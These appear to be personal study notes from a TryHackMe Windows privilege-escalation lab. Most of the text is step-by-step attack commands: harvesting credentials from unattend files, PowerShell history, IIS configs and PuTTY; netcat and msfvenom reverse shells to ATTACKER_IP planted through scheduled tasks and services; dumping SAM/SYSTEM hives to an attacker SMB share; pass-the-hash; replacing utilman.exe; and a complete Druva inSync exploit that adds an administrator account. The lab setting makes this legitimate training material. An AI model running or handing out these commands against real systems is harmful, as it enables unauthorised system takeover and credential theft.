THM | Windows Privilege Escalation
· 13 min read
Red Teaming | Windows Privilege Escalation | Description:
Notes taken while exploring the Windows Privilege Escalation room on the Red Teaming Path. The primary goal is to master the fundamentals of Windows privilege‑escalation techniques.
1 | Introduction
2 | Windows Privilege Escalation
Local Service vs. Network Service Accounts
| Account Type | Key Characteristics | Access Level | Network Access | Use Case |
|---|---|---|---|---|
| Local Service Account | - Low-privilege built-in account - Runs services with minimal local system access - Cannot authenticate to remote network resources | Limited local access | No network authentication | Services that only need local system resources and do not require network connectivity |
| Network Service Account | - Built-in Windows account - Can access network resources - Uses computer's network credentials | Limited network access | Can authenticate to remote network resources using computer account credentials | Services that need to interact with network resources but do not require specific user credentials |
3 | Harvesting Passwords from Usual Spots
Unattended Windows Installations
- if Windows Deployment Services was used for deployment (deploy a single os image to multiple hosts)
- require an admin account to perform the install -> might be stored in:
C:\Unattend.xmlC:\Windows\Panther\Unattend.xmlC:\Windows\Panther\Unattend\Unattend.xmlC:\Windows\system32\sysprep.infC:\Windows\system32\sysprep\sysprep.xml
Powershell History
- grab ps history with cmd
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt - grab ps history with ps
type $Env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Saved Windows Credentials
- windows allows us to use other user's credentials -> option to save creds on the system
cmdkey /lists - use the saved credentials to run programs
runas /savecred /user:admin cmd.exe
IIS Configuration
- Internet Information Services (IIS) default web server on Windows
- config is stored in
web.config - potential storage locations
C:\inetpub\wwwroot\web.configC:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
- grab the connection string
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
Retrieve Credentials from Software: PuTTY
- users can store session creds and config data
- not SSH passwords, but proxy confs with cleartext auth. creds.
- retrieve proxy creds.
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
4 | Other Quick Wins
Scheduled Tasks
- check on a service
schtasks /query /tn vulntask /fo list /v Task to Runparameter -> binary that get's executedRun As Userparameter -> under which context the binary is executed- check permissions on the binary (F: Full Access)
icacls c:\tasks\schtask.bat
Attack Example
- find a service whose binary you have permission to modify (
c:\tasks\schtask.bat|vulntask) - overwrite the binary to spawn a reverse shell
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat - catch the reverse connection
nc -lvp 4444 - wait for the scheduled task to run (or trigger manually)
schtasks /run /tn vulntask
AlwaysInstallElevated
- IDEA: Windows installer files (also known as .msi files) are used to install applications on the system. They usually run with the privilege level of the user that starts it. However, these can be configured to run with higher privileges from any user account (even unprivileged ones). This could potentially allow us to generate a malicious MSI file that would run with admin privileges.
- Requires 2 registry values to be set:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
:: and
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
Attack Example
- if both registry values are set -> generate malicious .msi file
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_MACHINE_IP LPORT=LOCAL_PORT -f msi -o malicious.msi - run the metasploit handler module to catch the reverse shell
- run the malicious binary once transfered over to the target system
msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi
5 | Abusing Service Misconfigurations
Windows Services
- check on a service and grab it's configuration
sc qc apphostsvc BINARY_PATH_NAMEparameter -> the assiciated executableSERVICE_START_NAMEparameter -> the account used to run the service- NOTE: Services have a Discretionary Access Control List (DACL), which indicates who has permission to start, stop, pause, query status, query configuration, or reconfigure the service, amongst other privileges
- use Process Hacker to check on them
- services configurations are stored under
HKLM\SYSTEM\CurrentControlSet\Services\ - in
regedit:Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AppHostSvcImagePath-> associated executableObjectName-> the account used to start the service- if DACL is configured for the service -> it will be stored in a subkey called
Security
Insecure Permissions on Service Executable
- IDEA: If the executable associated with a service has weak permissions that allow an attacker to modify or replace it, the attacker can gain the privileges of the service's account trivially
Attack Example
- check the service configuration
sc qc WindowsScheduler - check the permissions on the executable
icacls C:\PROGRA~2\SYSTEM~1\WService.exe - generate the exe-service payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe - serve it up via python webserver
python3 -m http.server - download the payload
wget http://ATTACKER_IP:8000/rev-svc.exe -O rev-svc.exe - replace the service executable
cd C:\PROGRA~2\SYSTEM~1\
move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-svc.exe WService.exe - grant full permissions to the Everyone group
icacls WService.exe /grant Everyone:F - start reverse shell on attack box
nc -lvp 4445 - wait for the service to restart (trigger it, or restart it manually)
sc stop windowsscheduler
sc start windowsschedulers - or if using PS (
scis alias forSet-Content-> usesc.exe)sc.exe stop windowsscheduler
sc.exe start windowsschedulers
Unquoted Service Paths
- IDEA: Create any of the executables that are searched for before the expected service executable and force the service to run the arbitrary executable.
- NOTE: Most service executables are installed under
C:\Program FilesorC:\Program Files (x86)-> is NOT writeable by unprivileged users by default
Attack Example
- check permissions on the target directory
icacls c:\MyPrograms
:: AD and WD privileges -> can create subdirs and files - create exe-service payload and transfer it to the target
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4446 -f exe-service -o rev-svc2.exe - start netcat listener
nc -lvp 4446 - once transfered, move it to any of the locations where hijacking might occur
move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe - grant Everyone full permissions on the file
icacls C:\MyPrograms\Disk.exe /grant Everyone:F - wait for the service to restart (or trigger it manually)
sc stop "disk sorter enterprise"
sc start "disk sorter enterprise"
Insecure Service Permissions
-
IDEA: the service DACL (not the service's executable DACL) allows you to modify the config of a service -> allows you to point to ANY executable and run it with ANY account (including SYSTEM)
-
check for a service DACL (with
Accesschkfrom theSysinternals suite):: it is installed to `C:\tools\AccessChk` and command is run from there
accesschk64.exe -qlc thmservice -
SERVICE_ALL_ACCESSpermission withBUILTIN\\Users-> any user can reconfigure the service
Attack Example
- create the exe-service reverse shell and start the listener
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4447 -f exe-service -o rev-svc3.exe
nc -lvp 4447 - transfer the rev. shell executable over to the target
- grant permission to Everyone
icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F - reconfigure the service: change the service's associated executable and account
:: mind the spaces after the equal sign
sc config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem - run the service (can use any account to do it)
sc stop THMService
sc start THMService
6 | Abusing dangerous privileges
Windows Privileges
- NOTE: Privileges are rights that an account has to perform specific system-related tasks. These tasks can be as simple as the privilege to shut down the machine up to privileges to bypass some DACL-based access controls.
- complete list of privileges on Win systems
- list of exploitable privileges
- check on assigned privileges for the current user
whoami /priv
SeBackup / SeRestore
- allow users to read and write to any file in the system, ignoring any DACL in place
Attack Example - Copy SAM and SYSTEM registry hives
- log in as user that is part of "Backup Operators" group with SeBackup and SeRestore privileges
- open cmd as administrator -> will be prompted for password
- check on our privileges
whoami /priv - grab (backup) the SAM and SYSTEM hashes
reg save hklm\system C:\Users\THMBackup\system.hive
reg save hklm\sam C:\Users\THMBackup\sam.hive - copy files over to the attack box (here over SMB)
- create SMB share on attackbox
mkdir share
# share named public pointing to the share dir
# requires the username and password of our current windows session
python3.9 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share - copy the files over (on targetbox)
copy C:\Users\THMBackup\sam.hive \\ATTACKER_IP\public\
copy C:\Users\THMBackup\system.hive \\ATTACKER_IP\public\ - retrieve the user pwd with
impacketpython3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL
# example for Admin entry
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94::: - perform Pass-the-Hash with the Admin's hash
python3.9 /opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94 administrator@MACHINE_IP
SeTakeOwnership
- allows a user to take ownership of any object on the system, including files and registry keys
- IDEA: search for a service running as SYSTEM and take ownership of the service's executable
- NOTE: being the owner of a file doesn't necessarily mean that you have privileges over it, but being the owner you can assign yourself any privileges you need
Attack Example - Abuse utilman.exe (Ease of Access option during lock screen)
- log in with the user that has the SeTakeOwnership privilege
- open a
cmdas admin - check on your privileges
whoami /priv - Utilman is run with SYSTEM privileges -> replace the original binary
- take ownership of the binary
takeown /f C:\Windows\System32\Utilman.exe - give your user full permissions over
utilman.exeicacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F - replace
utilman.exewith a copy ofcmd.execopy cmd.exe utilman.exe - trigger utilman -> lock the screen -> click on the "Ease of Access" button
SeImpersonate / SeAssignPrimaryToken
- allow a process to impersonate other users and act on their behalf
- usually consists of being able to spawn a process or thread under the security context of another user
- IDEA: if we take control of a process with SeImpersonate or SeAssignPrimaryToken privileges, we can impersonate any user connecting and authenticating to that process
- NOTE:
LOCAL SERVICEandNETWORK SERVICE ACCOUNTSalready have such privileges- IIS default account:
iis apppool\defaultapppool
- IIS default account:
Attack Steps
- spawn a process so that users can connect and authenticate to it for impersonation to occur
- Find a way to force privileged users to connect and authenticate to the spawned malicious process
Attack Example - Use RougeWinRM to trigger the BITS service and impersonate it's SYSTEM privilege
- BACKGROUND-INFO:
- The RogueWinRM exploit is possible because whenever a user (including unprivileged users) starts the BITS service in Windows, it automatically creates a connection to port 5985 using SYSTEM privileges. Port 5985 is typically used for the WinRM service, which is simply a port that exposes a Powershell console to be used remotely through the network.
- If, for some reason, the WinRM service isn't running on the victim server, an attacker can start a fake WinRM service on port 5985 and catch the authentication attempt made by the BITS service when starting. If the attacker has SeImpersonate privileges, he can execute any command on behalf of the connecting user, which is SYSTEM.
- upload
RogueWinRMto the target box (here already done - inC:\tools\) - check on the assigned privileges
whoami /priv - start netcat listener on attackbox
nc -lvp 4442 - trigger the RogueWinRM exploit
:: -p: specify the executable; -a: arguments to pass to the executable
c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe ATTACKER_IP 4442" - NOTE: The BITS service will stop automatically after 2 minutes of starting
7 | Abusing vulnerable software
Unpatched Software
- NOTE: the
wmic productcommand may not return all installed programs (depending on how the programs were installed)- check desktop shortcuts, available services
- use the
wmictool to list the software installed on the target system and its versionswmic product get name,version,vendor - search for existing exploits on the installed software
Attack Example - Druva inSync 6.6.3
-
multiple vulnerabilities
-
IDEA: The software is vulnerable because it runs an RPC (Remote Procedure Call) server on port 6064 with SYSTEM privileges, accessible from localhost only.
-
RPC-BACKGROUND: it is simply a mechanism that allows a given process to expose functions (called procedures in RPC lingo) over the network so that other machines can call them remotely
-
HERE: In the case of Druva inSync, one of the procedures exposed (specifically procedure number 5) on port 6064 allowed anyone to request the execution of any command. Since the RPC server runs as SYSTEM, any command gets executed with SYSTEM privileges.
- patch only requires the command to start with
C:\ProgramData\Druva\inSync4\ - simple workaround:
C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe
- patch only requires the command to start with
-
$ErrorActionPreference = "Stop"
$cmd = "net user pwnd /add"
$s = New-Object System.Net.Sockets.Socket(
[System.Net.Sockets.AddressFamily]::InterNetwork,
[System.Net.Sockets.SocketType]::Stream,
[System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)
$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);
$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command) -
modify the executed command (via
$cmdvar) to create a user and assign him admin privilegesnet user pwnd SimplePass123 /add & net localgroup administrators pwnd /add -
once run, open a admin cmd as
pwndwith your newly added user and it's pwd
8 | Tools of the Trade
WinPEAS
- available both as a precompiled executable or a .bat script
- lengthly output -> redirect output to a file
winpeas.exe > outputfile.txt
PrivescCheck
- PS script
- requires NO execution of a binary file
- NOTE: you may need to bypass execution policy restrictions
Set-ExecutionPolicy Bypass -Scope process -Force - load the module and run it
. .\PrivescCheck.ps1
Invoke-PrivescCheck
WES-NG
- Windows Exploit Suggester - Next Generation
- runs on the attacking machine
- a python script
- update the database -
wes.py --update - requires you to run
systeminfoon the target and transfer the output to the attackbox - run the check -
wes.py systeminfo.txt
Metasploit
- if you already have a Meterpreter shell on the target
- use the
multi/recon/local_exploit_suggestermodule to list vulnerabilities